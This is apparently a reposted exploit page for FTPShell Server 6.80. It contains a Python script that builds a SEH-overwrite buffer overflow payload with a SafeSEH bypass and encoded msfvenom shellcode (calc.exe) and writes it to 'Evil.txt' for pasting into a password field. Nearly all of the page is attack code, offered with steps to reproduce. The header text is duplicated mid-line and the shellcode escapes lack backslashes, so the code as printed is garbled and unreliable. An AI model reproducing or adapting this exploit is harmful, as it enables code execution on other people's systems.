FTPShell Server 6.80 Local Buffer Overflow

Details
Category: Vulnerabilities
Hits: 290
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : FTPShell Server v6.80 - Local Buffer Ove #!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : FTPShell Server v6.80 - Local Buffer Overflow (SafeSEH Bypass) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://www.ftpshell.com/ #
# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm #
# Tested on : Windows XP Professional SP3 #
# Steps to reproduce : paste contents of Evil.txt in 'Password' field under configure accounts>Change pass #
#----------------------------------------------------------------------------------------------------------#

'''
Notes:
=====
* All loaded modules including base binary are compiled with /SAFESEH
* Null byte 'x00' get mangled by the program and end up as space 'x20'
'''

#root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -b "x00x0ax0d" -f python -v shellcode
#Payload size: 447 bytes
shellcode = ""
shellcode += "x89xe0xd9xedxd9x70xf4x5ax4ax4ax4ax4a"
shellcode += "x4ax4ax4ax4ax4ax4ax4ax43x43x43x43x43"
shellcode += "x43x37x52x59x6ax41x58x50x30x41x30x41"
shellcode += "x6bx41x41x51x32x41x42x32x42x42x30x42"
shellcode += "x42x41x42x58x50x38x41x42x75x4ax49x79"
shellcode += "x6cx7ax48x4cx42x67x70x73x30x57x70x43"
shellcode += "x50x4dx59x4bx55x36x51x59x50x61x74x4e"
shellcode += "x6bx56x30x46x50x6ex6bx61x42x56x6cx6c"
shellcode += "x4bx72x72x32x34x6ex6bx61x62x37x58x76"
shellcode += "x6fx38x37x72x6ax54x66x55x61x4bx4fx4e"
shellcode += "x4cx45x6cx30x61x71x6cx35x52x46x4cx45"
shellcode += "x70x6bx71x58x4fx44x4dx77x71x69x57x7a"
shellcode += "x42x6cx32x63x62x46x37x4ex6bx62x72x62"
shellcode += "x30x6ex6bx53x7ax47x4cx4cx4bx52x6cx74"
shellcode += "x51x52x58x6bx53x62x68x77x71x5ax71x62"
shellcode += "x71x4ex6bx76x39x57x50x36x61x4ax73x6e"
shellcode += "x6bx47x39x56x78x59x73x65x6ax52x69x6e"
shellcode += "x6bx57x44x6cx4bx67x71x4ex36x34x71x6b"
shellcode += "x4fx6ex4cx5ax61x58x4fx74x4dx76x61x4b"
shellcode += "x77x70x38x69x70x52x55x38x76x75x53x51"
shellcode += "x6dx59x68x65x6bx73x4dx65x74x43x45x78"
shellcode += "x64x61x48x6cx4bx36x38x67x54x76x61x49"
shellcode += "x43x73x56x4cx4bx76x6cx50x4bx6ex6bx31"
shellcode += "x48x77x6cx43x31x79x43x6ex6bx43x34x4c"
shellcode += "x4bx53x31x7ax70x4dx59x37x34x66x44x67"
shellcode += "x54x33x6bx53x6bx50x61x30x59x31x4ax63"
shellcode += "x61x69x6fx59x70x71x4fx51x4fx33x6ax6e"
shellcode += "x6bx76x72x6ax4bx6ex6dx33x6dx43x5ax63"
shellcode += "x31x6cx4dx6cx45x4cx72x47x70x45x50x33"
shellcode += "x30x56x30x53x58x74x71x4ex6bx62x4fx4f"
shellcode += "x77x59x6fx6bx65x6fx4bx4cx30x4fx45x6d"
shellcode += "x72x43x66x62x48x39x36x6ax35x6fx4dx4d"
shellcode += "x4dx59x6fx5ax75x47x4cx53x36x63x4cx55"
shellcode += "x5ax4fx70x49x6bx6dx30x31x65x53x35x6d"
shellcode += "x6bx62x67x37x63x30x72x62x4fx32x4ax55"
shellcode += "x50x70x53x79x6fx6ex35x31x73x71x71x30"
shellcode += "x6cx71x73x46x4ex43x55x51x68x35x35x35"
shellcode += "x50x41x41"

buffer = 'xcc' * 2101 # filler to nSEH offset
buffer += 'xebx06x90x90' # nSEH | hop over SEH
buffer += 'x18x05xfcx7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]
buffer += 'x90' * 10 # nops sled
buffer += shellcode # calc.exe
buffer += 'xcc' * (5000-2101-4-4-10-len(shellcode))

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e